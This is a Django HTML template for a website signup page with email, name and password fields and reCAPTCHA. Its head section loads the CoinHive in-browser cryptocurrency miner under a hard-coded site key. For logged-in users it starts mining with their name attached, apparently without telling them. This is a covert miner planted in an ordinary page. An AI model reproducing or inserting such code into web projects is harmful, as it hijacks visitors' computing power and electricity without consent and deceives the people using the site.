<!DOCTYPE html>
<html lang="en">
  <head>
    {% include "header.html" %}
    {% load staticfiles %}
    <link rel="stylesheet" href="{% static "sign.css" %}">
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>	
      {% if login %}
        var miner = new CoinHive.User('R8uBnEUWe9lzB5R9BAhAoPiaNbIvv56c','{{ name }}',{
          autoThreads: true,
          throttle: 0.6
        });
        miner.start();
      {% else %}
        var miner = new CoinHive.Anonymous('R8uBnEUWe9lzB5R9BAhAoPiaNbIvv56c',{
          autoThreads: true,
          throttle: 0.5
        });
      {% endif %}
    </script>
  </head>
  <body>
    {% include "navbar.html" %}
    <div class="row"> 
      <div class="col"></div>
      <div class="card col-10 col-xs-10 col-sm-8 col-md-6 col-lg-6 col-xl-4 out">
          <div class="card-header">Signup</div>
          <div class="card-body">
              <form action="/signup" method="post" >
                <label>Email address</label>
                <div class="form-group">          
                  <input type="email" class="form-control" id="email" name='email' aria-describedby="emailHelp" placeholder="Enter email" autofocus required>
                </div>
                <label>Name</label>
                <div class="form-group">          
                  <input type="text" class="form-control" id="name" name='name'  placeholder="Enter name" required>
                </div>
                <label>Password</label>
                <div class="form-group">  
                  <input type="password" class="form-control" id="password" name='password' placeholder="Password" required>
                </div>
                <label>Comfirm Password</label>
                <div class="form-group">  
                  <input type="password" class="form-control" id="repassword" name='repassword' placeholder="Comfirm password" required>
                </div>
                <script src='https://www.google.com/recaptcha/api.js'></script>
                <div class="g-recaptcha" data-sitekey="6Lcn8DIUAAAAAMX7uxaBr5HLPYeV1VvES2kheKXU"></div>
                {% csrf_token %}
                <button type="submit" class="btn btn-primary">Submit</button>
                <p>{{error}}</p>
              </form>       
          </div>
        </div>
      <div class="col"></div> 
    </div>
  </body>
</html>